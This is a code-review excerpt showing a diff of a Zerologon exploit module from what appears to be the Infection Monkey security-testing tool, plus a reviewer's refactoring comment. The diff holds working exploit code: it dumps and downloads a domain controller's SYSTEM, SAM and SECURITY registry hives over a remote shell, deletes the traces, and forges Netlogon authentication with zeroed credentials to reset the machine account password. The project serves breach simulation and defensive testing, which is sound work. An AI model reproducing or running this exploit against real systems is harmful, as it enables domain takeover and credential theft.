monkey/infection_monkey/exploit/zerologon.py

```diff
@@ -0,0 +1,743 @@
+                                    'reg save HKLM\\SECURITY security.save')
+
+                # Get HKLM keys locally (can't run these together because it needs to call do_get()).
+                remote_shell.onecmd('get system.save')
+                remote_shell.onecmd('get sam.save')
+                remote_shell.onecmd('get security.save')
+
+                # Delete saved keys on victim.
+                remote_shell.onecmd('del /f system.save sam.save security.save')
+
+                wmiexec.close()
+
+                return True
+
+            except Exception as e:
+                LOG.info(f"Exception occured: {str(e)}")
+
+            finally:
+                info = _unset_stdout_and_return_captured()
+                LOG.debug(f"Getting victim HKLM keys via remote shell: {info}")
+
+        else:
+            raise Exception("Could not start remote shell on DC.")
+
+    def attempt_restoration(self, original_pwd_nthash):
+        # Connect to the DC's Netlogon service.
+        rpc_con = self.connect_to_dc()
+
+        plaintext = b'\x00'*8
+        ciphertext = b'\x00'*8
+        flags = 0x212fffff
+
+        # Send challenge and authentication request.
+        server_challenge_response = nrpc.hNetrServerReqChallenge(rpc_con, self.dc_handle + '\x00',
+                                                                 self.dc_name + '\x00', plaintext)
+        server_challenge = server_challenge_response['ServerChallenge']
+
+        try:
+            server_auth = nrpc.hNetrServerAuthenticate3(
+                rpc_con, self.dc_handle + '\x00', self.dc_name + '$\x00',
+                nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
+                self.dc_name + '\x00', ciphertext, flags
+            )
+
+            # It worked!
+            assert server_auth['ErrorCode'] == 0
+            # server_auth.dump()
+            session_key = nrpc.ComputeSessionKeyAES(None, b'\x00'*8, server_challenge,
+                                                    unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
+
+            try:
+                authenticator = nrpc.NETLOGON_AUTHENTICATOR()
+                authenticator['Credential'] = ciphertext
+                authenticator['Timestamp'] = b"\x00" * 4
+
+                nrpc.NetrServerPasswordSetResponse = NetrServerPasswordSetResponse
+                nrpc.OPNUMS[6] = (NetrServerPasswordSet, nrpc.NetrServerPasswordSetResponse)
+
+                request = NetrServerPasswordSet()
+                request['PrimaryName'] = NULL
+                request['AccountName'] = self.dc_name + '$\x00'
+                request['SecureChannelType'] = nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel
+                request['ComputerName'] = self.dc_name + '\x00'
+                request["Authenticator"] = authenticator
+                pwd_data = impacket.crypto.SamEncryptNTLMHash(unhexlify(original_pwd_nthash), session_key)
+                request["UasNewPassword"] = pwd_data
```

Comment:
I think all of the above code can be extracted into a unit testable, static method called `form_password_reset_request` or something like that. Also, note that a lot of request properties match with request formed in `attempt_exploit` so maybe we can also avoid code duplication?